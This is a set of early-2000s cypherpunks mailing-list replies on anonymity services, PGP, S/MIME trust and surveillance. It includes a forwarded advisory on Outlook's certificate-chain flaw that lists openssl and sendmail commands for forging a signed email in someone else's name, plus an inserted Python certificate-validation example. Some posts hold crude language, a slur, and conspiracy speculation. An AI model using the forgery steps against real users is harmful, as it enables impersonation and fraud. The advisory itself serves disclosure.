Running a cypherpunks list node?
If one were inclined to host a cypherpunks list node, where would one obtain the necessary information? -MW-
Re: Terror Reading
On Sun, 31 Aug 2003, Anonymous wrote: Some librarians are probably now thinking they have a patriotic duty to see what people are reading and to report any suspicious behavior. Part of the intent of the Patriot Act and the Library Awareness Program was to bamboozle the nation's librarians into acting as the kind of ward watchers that were once so common in the Soviet Union (the babushkas who sat on each floor of apartment buildings and filed reports on the comings and goings of their flock). The purpose of this is purely a show and indoctrination. 1. No self-respecting terrorist would go to a fucking library to do terror reading (maybe there is something positive here - I think that we should get protected by pigs from extremely dumb terrorists.) The risk is not one terrorists have to fear. The biggest problem with the librarian narc program is the same as most of these anti-terrorism measures: completely innocent people are harassed, arrested, or placed under suspicion. You won't catch a terrorist learning to be evil at a library, but you might wrongfully snare an innocent citizen who happens to have an interest in bad books. How long until this program is extended to include anyone checking out any book that some part of the US law enforcement body deems bad? If you read Pikhal, do you end up on a watch list? -MW-
Re: Schneier at toorcon 2003
On Mon, 25 Aug 2003, Major Variola (ret) wrote: I'm told by an organizer that Bruce Schneier will be speaking at toorcon in San Diego this year. See www.toorcon.org for info. This is of interest why?
Re: Popular Net anonymity service back-doored (fwd)
On Fri, 22 Aug 2003, Thomas Shaddack wrote: Yet more info. Let's not overreact before we get complete dataset. It is worth noting that the notice mentioned below was placed on the JAP website only after the news of the back channel was made public on Usenet and the various security mailing lists. Not the most laudable behavior, to say the least. -MW- -- Forwarded message -- Date: Fri, 22 Aug 2003 09:34:27 +0200 Subject: Re: Popular Net anonymity service back-doored From: nordi [EMAIL PROTECTED] To: [EMAIL PROTECTED], [EMAIL PROTECTED] On Thursday, 21. August 2003 14:05, Thomas C. Greene wrote: It's not secure, and claiming that it is taints anything else they may be doing on behalf of users. They're *still* saying it's impossible for anyone to intercept users' traffic or identify them. Actually, this is absolutely not what they are saying. When you visit the website of the JAP project http://anon.inf.tu-dresden.de/ it says in big, red letters: Aus aktuellem Anlass weisen wir noch einmal ausdrücklich daraufhin, dass sich die JAP Software in Entwicklung befindet und noch nicht maximale Sicherheit bietet. (siehe unten ... ) In English this means something like Due to recent events we explicitly inform you of the fact that the JAP software is still being developed and does not yet provide maximum security. (see below ...) As I said: big, red letters at the top of their main page. And when you click that see below link it says there Attention! [...] This version does NOT yet implement the security features described above and desired by us. But it does already protect you against attackers that control the net only locally at one place such as [...] the owner of a mix. So by the time you download that software you should have already read _two_ statements telling you that JAP is not as secure as it could be.
It also tells you that in the current configuration, the JAP people can see all your traffic if they want to: Note that it says it will protect you against the owner of _A_ mix. But if you take the Dresden-Dresden cascade, the JAP people obviously control _all_ of them. And the above statement already implies that in this case, JAP cannot protect you. If you still want to use JAP, http://www.heise.de/newsticker/data/uma-20.08.03-000/ (in German) tells you how to do it securely: simply use just a single mix that is not controlled by the JAP project and you'll be fine. The court order is only valid for the JAP people, so everybody else in Germany (and elsewhere of course) can offer a non-backdoored mix which will make the cascade secure. This actually means that all cascades but the Dresden-Dresden one are secure. Regards, nordi -- For humanity is threatened by wars compared with which the past ones are like feeble attempts, and they will come without any doubt if the hands of those who prepare them in full public view are not smashed. Bertolt Brecht, 1952
RE: pgp in internet cafe (webpgp)
On Sun, 23 Mar 2003, Lucky Green wrote: The question is - do I have to code this or has someone already done it ? http://www.lokmail.com/ It is inadvisable that anyone use Lokmail. The implications of a trust-us encrypted mail service are obvious, and the people behind Lokmail are of dubious integrity. If you're looking for secure web-based PGP, look at www.hushmail.com.
Re: Shuttle Humor
On Sat, 1 Feb 2003, Eric Cordian wrote: The look on your fellow astronauts' faces right before the grenade you are holding explodes --PRICELESS Please. If we're going to toss around conspiracy theories, let's make sure they are sane. I am having a hard time imagining a scenario in which it would benefit the Israeli cause to blow up their first astronaut in space. Perhaps if it could be made to appear as a terroristic act by the evil ragheads, maybe Israel would attempt a stunt like this, to further the American/Israeli brothers in arms mentality. But there appears to be no such scenario that is remotely plausible. The only theory that I find remotely worth pursuing is that the shuttle was bringing something back to earth that didn't want to come down. Tim seems to have thoughts about this -- how easily could a satellite be designed with a self-destruct upon reentering Earth's atmosphere device? The motivation would certainly be there. I can't see China perpetrating a terrorist act against the US at this point in time, but I could see China taking steps to prevent the successful theft of its military surveillance devices. This isn't to say that force majeure isn't the most likely culprit here. Space travel is inherently dangerous, and I'm honestly surprised that less than 2% of our shuttle flights have resulted in catastrophe. -MW-
Re: Matt Blaze Does Master Keys
On Thu, 23 Jan 2003, Eric Cordian wrote: Nonetheless, it's an interesting story. I should note that the high security building I live in regards master keying doors as a bad thing to do, and they have a key board and a signout sheet in the main office. http://www.nytimes.com/2003/01/23/business/23LOCK.html l/p=cpunx/cpunx I have to think that Matt is being satirical here. This is hardly news, as any locksmith can tell you. (This is one of the reasons that some lock companies restrict the sale of key blanks, and others (such as Medeco or ASSA) require keys be made by the original supplier, using unique key blanks.) -MW-
Re: cloning as heresy (Re: Fresh Hell)
On Sat, 18 Jan 2003, Harmon Seaver wrote: Ah, now I see. Before, I was thinking that he was talking about the passage where Onan pulls out and spills his seed on the ground, which, somehow, became a prescription against masturbation, although reading it, especially in context, is clearly just about pulling out. Or possibly against birth-control. Thou shalt not pull out, thus saith the Lord, or in any other way deprive thy partner of the power of thy final orgasmic thrusting. 8-) Weird, isn't it, that this became so associated with masturbation that a very successful company -- Onan -- even would choose their name for generators, i.e., self power or do it alone, etc., from that passage. Even weirder that it doesn't have the slightest thing to do with jacking off, but with someone not willing to accept their (at the time) societal duty to support his dead brother's wife and father her children. The irony, of course, is what the Catholic Church would have to say if the brothers-in-law of modern widows resumed this practice. -MW-
Re: Brinworld: Samsung SCH-V310 camcorder phone
On Mon, 13 Jan 2003, Tim May wrote: Samsung unveil new 3G camcorder phone http://www.3gnewsroom.com/3g_news/jan_03/news_2906.shtml Hardly Brinworld. And T-Mobile has had it for awhile. Why is warmed-over technology news given headlines? ... and they lie about it being 3G (which doesn't exist yet.) -MW-
3G Phones (was: Re: Brinworld: Samsung SCH-V310 camcorder phone)
On Tue, 14 Jan 2003, Steve Mynott wrote: ... and they lie about it being 3G (which doesn't exist yet.) It's a CDMA2000 phone which is 3G. 3G networks exist in many parts of the world, although behind schedule in other parts. Hmm. I actually can't find any specs on that phone's max speed. The CDMA2000 service being offered by Sprint and Verizon in the US does not meet the criteria for 3G. CDMA2000 1x, as defined by the ITU, is a 3G standard. Keep in mind, however, that in order to be 3G by the ITU definition, a standard needs to deliver data rates of a minimum of 144 Kbps. The top speed I've seen advertised for CDMA2000 deployments is 70 Kbps. Is CDMA2000 being used outside North America? I thought GSM/GPRS was the dominant standard in Europe and Asia. (GPRS is never 3G.) -MW-
Re: Indo European Origins
On Thu, 9 Jan 2003, Tyler Durden wrote: Soma? Despite the fact that I've read large chunks of the Rig Vedas, I don't remember anything called Soma (unless this is a Brave New World Reference). Of course, the Bhagavad Gita is a subsection of the Mahabharata but I don't imagine this is what you are referring to... Then you need to read the Vedas [there is only one Rig-Veda, which is the oldest of the four Vedas] again more closely. Soma is mentioned repeatedly throughout the Vedic hymns. Soma is both an intoxicating elixir, and the god that represents it. Soma is sometimes thought to have been alcohol, a mead-like substance, marijuana, psychedelic mushrooms, or other nourishing substances. (The composition of soma is hotly debated by scholars -- I have no firm answer myself.) Soma is said to have nourishing properties, and even the power to instill immortality. (C.f. the eclipse myth of the Hindu demon Rahu.) And, as you mention, soma is a prozac/valium or MDEA-like socially acceptable drug in Huxley's classic, as well as a brand name for the muscle relaxant carisoprodol (whose effects are a great disappointment, if one is expecting it to be anything like the Hindu or Huxley substance of the same name.) The original poster was, no doubt, referring to the original Soma, however. -MW-
Re: I crypt you
On Tue, 24 Dec 2002, Anonymous wrote: (unrelated, I noticed that there is no un-crippled free version of PGP for windows XP any more - 8.0 beta expired) What about PGP 8.0 Freeware? That isn't crippled. (It doesn't include automatic email plugins, which many think are a bad idea anyway, and doesn't include PGPdisk, which is a great product, but addresses issues other than email privacy in transit.) So what is wrong with PGP 8.0 Freeware? -MW-
Re: War on drugs...
On 13 Dec 2002, Sleeping Vayu wrote: Uh...I'd point out that this is no coincidence. The Conspiracy Theorist would say that the War on Drugs was precisely the CIA's way to keep its own drug prices high and continue funding their own little activities. Plausible. Oh, and aside from the fatass oil pipeline they've wanted to build in Afghanistan, guess another little resource that Afghanistan has produced in the past (and that the Taliban had cracked down on)? Yeah--you got it--Poppies...and now that the Warlords are back in charge the cash crop is back. Remember that it was the US which encouraged the Taliban to crack down on the cultivation of Afghanistan poppies. A gift of several million US dollars convinced the Taliban to ban the farming of poppies, depriving the Afghani farmers of their livelihood, while not impacting the world drug trade (the Taliban wisely retained stock-piles of processed crop, ready for price-fixing.) Oil might have something to do with the US's interest in being Afghanistan's puppeteer, but it is unlikely that opium does as well. -MW-
Re: JYA ping
On Sun, 6 Oct 2002, Morlock Elloi wrote: It seems to be strange that he wrote at [EMAIL PROTECTED], an address which is also given on his web page, but ping pipeline.com doesn't work. Sorry to resort to ad hominem, but you're a technological imbecile. There is this magic thing in DNS called MX record. Read about it. Not to mention the practice of blocking ICMP at the firewall, which would result in pings not working. -MW-
Re: All your canadians are belong to us
On Sat, 21 Sep 2002, Major Variola (ret) wrote: At 11:08 AM 9/21/02 -0400, Greg Vassie wrote: says Dr Ann Coavoukian, the commissioner of information and privacy in Ontario, U.S.A. People are lying and vendors don't know what is false [or As a resident of Ontario, Canada, I'm quite surprised to learn that Ontario has been annexed by the United States. Ontario, California? No, Ontario, Canada: http://www.ipc.on.ca/ http://www.cfp2002.org/advisoryboard/cavoukian.shtml -MW-
Re: Free Copy of Applied Cryptography
On Wed, 11 Sep 2002, Lisa wrote: http://www.cacr.math.uwaterloo.ca/hac/ http://developers.slashdot.org/developers/02/09/11/1616231.shtml?tid=93 Handbook of Applied Cryptography Posted by michael on Wednesday September 11, 12:24PM from the complete-from-adelman-to-zimmerman dept. cconnell writes The Handbook of Applied Cryptography is now available free (for personal use) on the Internet. This is a $100 book. Note also the companion C source code for most of the crypto algorithms, written by James Pate Williams. There is some very cool code here! That's Handbook of Applied Cryptography, arguably a much better book than Applied Cryptography. It has been available in its entirety from that website for at least two years now. I suppose this is somewhat timely news, by Slashdot-i-cant-spell-zimmermann dept standards, anyway. -MW-
S/MIME in Outlook -- fucked.
... just making certain Lucky has seen this gem.

-- Forwarded message --
Date: Mon, 2 Sep 2002 10:37:23 -0700 (PDT)
From: Mike Benham [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: Outlook S/MIME Vulnerability

===
Outlook S/MIME Vulnerability
09/02/02
Mike Benham [EMAIL PROTECTED]
http://www.thoughtcrime.org
===

Abstract

Outlook's S/MIME implementation is vulnerable to the certificate chain spoofing attack, despite Microsoft's claim that IE is the only affected application. The vulnerability allows anyone to forge the digital signature on an email that is to be viewed with Outlook. No warnings are given, no dialogs are shown.

Description

For a complete description of the certificate chain attack, see: http://online.securityfocus.com/archive/1/286290

As with the IE SSL vulnerability, an attacker generates a bad certificate chain:

[Issuer:VeriSign | Subject:VeriSign]
[Issuer:VeriSign | Subject:www.thoughtcrime.org]
[Issuer:www.thoughtcrime.org | Subject:Bill [EMAIL PROTECTED]]

Outlook fails to check the Basic Constraints on the intermediate certificate and accepts the leaf certificate as valid.

Severity

As it stands, there is virtually no difference between signed and unsigned email in Outlook. Unless carefully inspected, signed email in Outlook is essentially meaningless. This also applies to any signed email received over the past 5+ years. Prudent users who must continue using Outlook for signed email should manually inspect and verify received certificate chains.

Affected Clients

Mozilla is NOT vulnerable.
Outlook Express 5 is vulnerable. (Tested on fully patched Win2k SP3 system)

Exploit

1) Put a valid CA-signed certificate and private key in a file middle.pem (If you don't have a valid CA-signed certificate, there's one bundled with sslsniff: http://www.thoughtcrime.org/ie.html)
2) Generate a fake leaf certificate signing request:
   a) openssl genrsa -out key.pem 1024
   b) openssl req -new -key key.pem -out leaf.csr
3) Sign the CSR with your intermediate certificate:
   a) openssl x509 -req -in leaf.csr -CA middle.pem -CAkey middle.pem -CAcreateserial -out leaf.pem
4) Sign a spoofed mail message:
   a) openssl smime -sign -in mail.txt -text -out mail.msg -signer leaf.pem -inkey key.pem -certfile middle.pem -from [EMAIL PROTECTED] -to [EMAIL PROTECTED] -subject SM Exploit
5) Send the mail:
   a) cat mail.msg | sendmail [EMAIL PROTECTED]

I encourage everyone to send Bill Gates an email from himself. =)

Vendor Notification Status

Microsoft knows about this, of course, but isn't even sure whether to call this a 'vulnerability'. Right.

- Mike
-- http://www.thoughtcrime.org
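The check the advisory says Outlook skips, as an added example that is not part of the forwarded post: a small Python model of certificate path validation that contrasts a validator checking only name chaining with one that also enforces Basic Constraints (cA flag and pathLenConstraint, per RFC 5280). The `Cert` class, the function names and the sample chains are constructed for illustration, and every signature in a chain is assumed to have already verified, which is exactly the situation in the advisory.

```python
from dataclasses import dataclass
from typing import List, Optional, Set, Tuple


@dataclass(frozen=True)
class Cert:
    """Simplified certificate: only the fields relevant to this check."""
    subject: str
    issuer: str
    is_ca: Optional[bool] = None    # basicConstraints cA; None = extension absent
    path_len: Optional[int] = None  # basicConstraints pathLenConstraint


def _names_chain(chain: List[Cert], anchors: Set[str]) -> Tuple[bool, str]:
    """chain[0] is the leaf, chain[-1] the root. Signatures are assumed valid."""
    if not chain:
        return False, "empty chain"
    for child, parent in zip(chain, chain[1:]):
        if child.issuer != parent.subject:
            return False, f"{child.subject}: issuer does not match {parent.subject}"
    root = chain[-1]
    if root.subject != root.issuer or root.subject not in anchors:
        return False, f"{root.subject}: not a trusted root"
    return True, "ok"


def naive_validate(chain: List[Cert], anchors: Set[str]) -> Tuple[bool, str]:
    """The flawed behaviour: the chain links up to a trusted root, so accept it."""
    return _names_chain(chain, anchors)


def strict_validate(chain: List[Cert], anchors: Set[str]) -> Tuple[bool, str]:
    """Also require every issuing certificate to be authorised as a CA."""
    ok, why = _names_chain(chain, anchors)
    if not ok:
        return ok, why
    for i, cert in enumerate(chain[1:], start=1):
        # An absent extension (None) must be treated the same as cA=FALSE.
        if cert.is_ca is not True:
            return False, f"{cert.subject}: not a CA (basicConstraints cA not asserted)"
        intermediates_below = i - 1  # CA certs between this one and the leaf
        if cert.path_len is not None and intermediates_below > cert.path_len:
            return False, f"{cert.subject}: pathLenConstraint {cert.path_len} exceeded"
    return True, "ok"


# Constructed sample data mirroring the chain shape shown in the advisory.
ANCHORS = {"VeriSign"}
ROOT = Cert("VeriSign", "VeriSign", is_ca=True)
FORGED = [
    Cert("spoofed-sender@example.invalid", "www.thoughtcrime.org"),
    Cert("www.thoughtcrime.org", "VeriSign", is_ca=False),  # ordinary end-entity cert
    ROOT,
]
LEGIT = [
    Cert("user@example.invalid", "Example Issuing CA"),
    Cert("Example Issuing CA", "VeriSign", is_ca=True, path_len=0),
    ROOT,
]
TOO_DEEP = [
    Cert("user@example.invalid", "Example Issuing CA"),
    Cert("Example Issuing CA", "VeriSign", is_ca=True),
    Cert("VeriSign", "VeriSign", is_ca=True, path_len=0),  # root allows no sub-CAs
]

if __name__ == "__main__":
    for name, chain in (("forged", FORGED), ("legit", LEGIT), ("too deep", TOO_DEEP)):
        print(name, "naive:", naive_validate(chain, ANCHORS),
              "strict:", strict_validate(chain, ANCHORS))
```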
Re: Mitigating Dangers of Compromised Anonymity
On Fri, 30 Aug 2002, Adam Shostack wrote: I'd like to suggest that while this may be fun, usability and getting millions of users to see that remailers are useful to them is a more useful goal. I agree, although I fail to see how working on this would interfere with that goal in any way. The anonymity set provided by the current extant systems is too small to protect anyone against anyone who is willing to kill or disappear people as part of their attacks against the remailers. I find this disbelievable. I suspect there are many groups which do not have the capability of defeating the remailer system who would still like to see it eliminated. Willingness to kill or disappear people isn't necessarily tied to technical capability, though I agree that entities which can defeat the remailer network without disappearing anyone are unlikely to pose a threat to the remops. If our goal is to make remailers harder to defeat, however, beforehand might be the right time to address the problem of missing remailer operators. (Incidentally, I could see this having uses outside the remailer operator world.) Oh, yeah, and incidentally, if you build this system, the attacker can simply add a bit of rubber hosing to their remop elimination program. To pry the signing key out of the victim? That's a personal how much torture can I take question for the victim to ask himself. He knows he'll be permanently disappeared after coughing up the private key. In many cases also it might be far harder to rubber-hose someone than simply cause an accident. -MW-
Re: Discouraging credential sharing with Mojo
On Wed, 21 Aug 2002, Anonymous wrote: Clearly we need a new approach. Here is a suggestion for a simple solution which will give everyone an important secret that they will avoid sharing. At birth each person will be issued a secret key. This will be called his Mojo. [snip] Now all that is needed is a simple change to the law so that knowing someone's Mojo makes him your slave. Virtually all cultures have held the mythological belief that all beings with souls have a True Name, and that knowledge of one's true name leads to power over him. (This isn't really surprising, since the True Name concept features prominently in Babylonian mythology, from which the myths of nearly all other civilizations have sprung.) For instance, knowing the True Name of a god could result in one being granted godly powers, or immortality (cf: Isis learning the True Name of Ra in Egyptian mythology). In Greek (and neo-pagan) nature myths, speaking the true name of a landscape object could give the speaker protection or favors from the spirit inhabiting the object. In Hebrew, Essene, and Islamic mythology, as well as Celtic, Pacific Island, and Norse tales, the True Name theme appears repeatedly. Etc. It sounds like you wish to revive this superstition, but instead make it cryptographically enforceable. Trust in the laws of mathematics and men, not of gods? Welcome to the Church of Strong Cryptography. Please join me in supporting this important reform. Just say, I want my Mojo! Sometimes, I wonder if some of these posts are not intended to be as ironic as they appear. -MW-
Re: Signing as one member of a set of keys
On Fri, 9 Aug 2002, Anonymous User wrote: This program can be used by anonymous contributors to release partial information about their identity - they can show that they are someone from a list of PGP key holders, without revealing which member of the list they are. Maybe it can help in the recent controversy over the identity of anonymous posters. It's a fairly low-level program that should be wrapped in a nicer UI. I'll send a couple of perl scripts later that make it easier to use. === Most delightful. Thank you for reminding us that Cypherpunks do indeed write code. More comments in a bit. [MW SNIP] ++multisig v1.0 [...] */ That [...] you see is an artifact of the anonymous remailer you were using. Mixmaster, I believe, gives the option to truncate messages which appear to include binary encoded data. PGP messages are explicitly allowed to be sent. Immediate problem: we can't verify your signature. Short term solution: find a remailer that allows binary posting. Long term solution: perhaps contact the Mixmaster authors and ask them to explicitly allow multisig data? -MW-
Re: why OpenPGP is preferable to S/MIME (Re: NAI pulls out the DMCA stick)
On Thu, 23 May 2002, Adam Back wrote: On Thu, May 23, 2002 at 03:05:49PM -0400, Adam Shostack wrote: So what if we create the Cypherpunks Root CA, which (either) signs what you submit to it via a web page, or publish the secret key? This won't achieve the desired effect because it will just destroy the S/MIME trust mechanism. S/MIME is based on the assumption that all CAs are trustworthy. Which is, of course, a major flaw. S/MIME is of some value for internal corporate email for companies who can run their own CA. (The sort of people who used to be Xcert's customers.) S/MIME is of very little value outside of a closed intranet environment, for the simple reason that public CAs are mostly incompetent, untrustworthy, or both. -MW-
Re: Joe Sixpack doesn't run Linux
On Thu, 23 May 2002, Curt Smith wrote: This is a fairly accurate description of the situation, but neglects to emphasize that the reason [1-cypherpunk] bothers convincing [2-coerced associate] to use encrypted e-mail is because [1] understands its importance and is attempting to share/spread that understanding. Yes, [1] understands its importance. I think you overestimate the amount of effort put forth by [1] to spread the Word, though. While evangelizing strong crypto might be second-nature to a cypherpunk, the other members of [1] are standards-setters because they must be. They require [2] to use strong crypto, because it is their asses if they don't. They don't care, and don't need to care, if [2] understands the value of strong crypto, as long as [2] uses it in communication with [1]. Although [3-Joe Sixpack] may not understand or appreciate encryption, [3]'s support is helpful to protect [1]'s cryptography rights. Furthermore once [3] has crypto, [3] will resist attempts to take it away (along with his six pack, etc.). With this, I fully agree. The challenge is to design a system that satisfies the security requirements for [1]'s threat model and the usability requirements for [3]'s attention span. It has yet to be done. All attempts thus far have been lucky if they only fail at one of those two goals. Most fail at both. -MW-
NAI pulls out the DMCA stick
NAI is now taking steps to remove the remaining copies of PGP from the Internet, not long after announcing that the company will not release its fully completed Mac OS X and Windows XP versions, and will no longer sell any copies of its PGP software. Do we still believe this was a pure cost-cutting measure? From: http://crypto.radiusnet.net/archive/pgp/index.html Date: Thu, 9 May 2002 13:01:40 -0500 From: [EMAIL PROTECTED] To: [EMAIL PROTECTED], [EMAIL PROTECTED] Subject: Network Associates, Inc. DMCA Notice DMCA NOTICE OF INFRINGING MATERIAL Via Email: [EMAIL PROTECTED]; [EMAIL PROTECTED]; Re: Digital Millennium Copyright Act Notice Dear Radiusnet.net I am writing on behalf of Networks Associates, Inc. and its affiliated companies (collectively, Network Associates). As you may know, Network Associates is a leading provider of computer software for network security and management. Among its business units are such well-known names as McAfee, PGP Security, Sniffer Technologies, and Magic Solutions. We have learned that Radiusnet.Net is providing access on its system or network to material that infringes the copyrighted work of Network Associates. In particular, I refer you to the web pages located at http://crypto.radiusnet.net/archive/pgp which contains links from your site that provide unauthorized copies of NAI proprietary materials, including software. The material on this web site infringes Network Associates' valuable copyrights. Accordingly, Network Associates requests that Radiusnet.Net immediately remove or disable access to this infringing material. You should know that Network Associates takes its intellectual property rights seriously. By bringing this matter to your attention, we hope that Radiusnet.Net will act promptly to remedy this problem.
We have a good faith belief that use of the material described above is not authorized by Network Associates, any of its agents, or the law. To the best of our knowledge, the information contained in this notification is accurate. Under penalty of perjury, I am authorized to act on behalf of Network Associates. If you have any questions or concerns, please contact me at the address listed above. You can also reach me by e-mail at [EMAIL PROTECTED] or by phone at +1 301-947-7150. Thank you for your anticipated cooperation. Sincerely, Peter Beruk Director, Anti-Piracy Programs Peter Beruk Director, Anti-Piracy Programs Network Associates, Inc. Phone: +1.301.947.7150 Fax: +1.301.527.0482